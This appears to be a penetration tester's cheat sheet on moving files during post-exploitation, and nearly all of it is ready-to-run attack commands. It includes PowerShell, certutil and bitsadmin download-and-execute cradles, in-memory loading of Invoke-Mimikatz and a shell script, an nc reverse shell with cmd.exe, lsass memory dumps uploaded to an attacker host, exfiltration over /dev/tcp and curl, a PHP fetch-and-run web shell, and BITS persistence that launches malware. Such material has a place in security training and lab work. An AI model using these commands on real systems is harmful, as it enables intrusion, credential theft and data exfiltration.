File Transfer

Basic commands

1
python -m SimpleHTTPServer 80
2
php -S 0.0.0.0:80
3
4
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
5
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
6
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
7
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
8
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
9
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
10
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
11
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
12
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
Copied!

execute ps1 files

1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
2
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1
Copied!

load it into the memory

1
IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
2
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
3
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\")
Copied!

ninja1

1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
2
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
3
echo $file = "jaws.ps1" >>wget.ps1
4
echo $webclient.DownloadFile($url,$file) >>wget.ps1
Copied!

SMB

1
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
2
net view \\10.10.14.17
3
copy \\10.10.14.17\a\nc.exe .
4
copy nc2.exe \\10.10.14.17\a\nc2.exe
Copied!

SMB with password + lsass dump

1
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
2
C:\>net use s: \\10.201.69.16\a /user:admin 123
3
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
4
copy c:\TEMPa.txt.dmp s:
Copied!

Execute nc via SMB (bypass defenses)

1
\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe
Copied!

netcat

1
ncat -lvp 80 > nc2.exe
2
nc -nv 10.10.14.17 < nc.exe -w 15
Copied!

copy files from target to kali

1
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
2
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
3
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')
4
5
nc -lvp 9999 > lsasss.dmp
Copied!

with PHP

1
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
Copied!

HTTP-POST

1
http-post.py
2
./curl -F '[email protected]_190824_231811.dmp' 10.10.15.213:8000/ -v
Copied!

/dev/tcp

1
cat xxx.zip > /dev/tcp/10.x.x.x.x/9001
2
nc -lvp 9001 > xxx.zip
Copied!

fetch (OpenBSD)

1
fetch http://10.11.0.244/exploit.c
2
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>
Copied!

rdesktop or remmina

1
rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>
Copied!

BITS

Download file into the C:\Windows folder.
1
> bitsadmin /create download
2
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
3
> bitsadmin /resume download
4
> bitsadmin /complete download
5
6
Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
7
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
8
Job resumed.
9
Job completed.
Copied!
Create persistence.
1
> bitsadmin /create persistence
2
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
3
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
4
> bitsadmin /resume persistence
Copied!
Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service | Mandiant

updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.
or simply:
1
python -m SimpleHTTPServer 8080
Copied!
or HTTPS with upload
😎
SecurityTools/httpsWithUpload.py at master · rhmoult/SecurityTools
GitHub

References

Post Exploitation File Transfers on Windows the Manual Way
15 Ways to Download a File
NetSPI
Transferring Files from Linux to Windows (post-exploitation)
ropnop blog